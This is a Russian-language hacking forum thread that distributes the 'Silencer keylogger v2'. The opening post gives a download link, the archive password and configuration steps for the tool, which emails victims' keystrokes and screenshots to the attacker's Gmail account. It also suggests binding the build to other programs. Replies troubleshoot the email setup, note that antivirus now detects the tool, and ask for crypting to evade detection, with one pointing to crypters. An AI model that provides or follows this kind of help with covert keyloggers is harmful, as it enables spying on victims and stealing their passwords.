Silencer keylogger v 2

Тема в разделе "Stealers|:|Formgrabbers|:|Keyloggers", создана пользователем znamenieznam, 7 янв 2012.

1. znamenieznam
    znamenieznam Новичок
    Симпатии:
    4
    asavepic.net_2310957m.jpg

Silencer keylogger v 2
    Kейлогер простой, но «сердитый» - чей функционал заключается в записи набранных с клавиатуры клавиш, скриншотов экрана и отсылке отчёта на почту. На детект билд не проверял, но нод у меня не заподозрил. Вес билда 65 kb, cпокойно можно склеить с любой программой.
    Скачать: http://upwap.ru/1943329
    Пароль на архив: xaker.name
    1. Gmail – мыло на Gmail.com
    2. Gmail sifre – пароль от него
    3. Gonderilen Adres – мыло куда идут логи
    4. Dakika – время через которое будут отсылаться логи
    з.ы. проверял на своем компе все логи приходят хорошо. В файл автозагрузку кидал еще server.exe, но думаю будет и без этого работать. Минус в том, что нет функции самоудаления.

Последнее редактирование: 16 янв 2012
    7 янв 2012
  2. aigera
    aigera Новичок
    Симпатии:
    3
    уже палят его надо криптоват!!! ВОПРОС; надо два мыло имет Gmail.com??? а то пишу одну не тестирует(ошибка)

Последнее редактирование: 7 янв 2012
    7 янв 2012
  3. BongoBong
    BongoBong Новичок
    Симпатии:
    0
    совершенно верно, нужно 2 мыла. всё работает, но действительно палят

7 янв 2012
  4. aigera
    aigera Новичок
    Симпатии:
    3
    Что то у меня не получаеться зарегил 2 мыло все по инструкции, но че то опять пишет; Mail gonderilemedi. Luften bilgilierinizi kontrol edin. ЭТО СКОРЕЕ ВСЕГО ТУРЕЦКИ..... ПЕРЕВОД: Почта, отправленная. Я прошу вас проверить,,,,, но так и нечего не пришло((((((

Последнее редактирование: 7 янв 2012
    7 янв 2012
  5. znamenieznam
    znamenieznam Новичок
    Симпатии:
    4
    нужно 2 мыла Gmail.com. Первое мыло вводить с паролем, а второе без него (то на которое будут идти логи)

Последнее редактирование: 8 янв 2012
    8 янв 2012
  6. aigera
    aigera Новичок
    Симпатии:
    3
    кейлогер так себе, из плюсов: делает скриншот отправляет на мыло. Минусов: не понимает русский шрифт

8 янв 2012
  7. znamenieznam
    znamenieznam Новичок
    Симпатии:
    4
    Не шлет русские символы да это минус. Плюс, что софт рабочий шлет скиншоты и англ. символы (пароли чаще всего такие и ставят). Кто может откриптовать софт?

11 янв 2012
  8. TDI
    TDI Новичок
    Симпатии:
    32
    крипты в этой теме

11 янв 2012
Загрузка...